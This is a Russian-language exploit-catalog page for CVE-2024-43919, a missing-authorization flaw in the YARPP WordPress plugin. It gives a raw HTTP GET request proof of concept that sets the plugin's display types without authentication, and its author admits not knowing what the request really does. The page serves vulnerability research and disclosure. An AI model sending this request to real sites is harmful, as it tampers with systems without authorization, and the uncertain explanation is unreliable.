Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-43919 — YARPP <= 5.30.10 - Отсутствие авторизации | Kitploit
Инструменты/GitHubGitHub/randomrobbiebf/cve-2024-43919
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на ПроникновениеНеправильная Конфигурация
GitHubrandomrobbiebf/cve-2024-43919

CVE-2024-43919

YARPP <= 5.30.10 - Отсутствие авторизации

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-43919

YARPP <= 5.30.10 - Отсутствие авторизации

Описание

Плагин YARPP – Yet Another Related Posts Plugin для WordPress подвержен несанкционированному доступу из-за отсутствия проверки прав доступа в файле ~/includes/yarpp_pro_set_display_types.php во всех версиях до 5.30.10 включительно. Это позволяет неаутентифицированным злоумышленникам устанавливать типы отображения.

root@kitploit:~
Type: plugin
CVSS Score: 5.3
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
CVE: CVE-2024-43919
Slug: yet-another-related-posts-plugin

Информация

Понятия не имею, что это на самом деле делает.

POC

Вот пример сырого HTTP-запроса, эксплуатирующего уязвимость в плагине YARPP:

root@kitploit:~
GET /wp-content/plugins/yet-another-related-posts-plugin/includes/yarpp_pro_set_display_types.php?ypsdt=false&types[]=post&types[]=page HTTP/1.1
Host: example.com

В этом запросе:

  • Параметр ypsdt установлен в false, чтобы обойти начальную проверку в коде.
  • Параметр types[] используется для указания типов отображения. В данном примере передаются post и page.
  • Заголовок Host указывает целевой сайт WordPress, на котором установлен уязвимый плагин YARPP.

Когда этот запрос отправляется на сайт WordPress с установленной уязвимой версией плагина YARPP, он установит типы отображения без необходимости какой-либо аутентификации или авторизации.

Скачать инструмент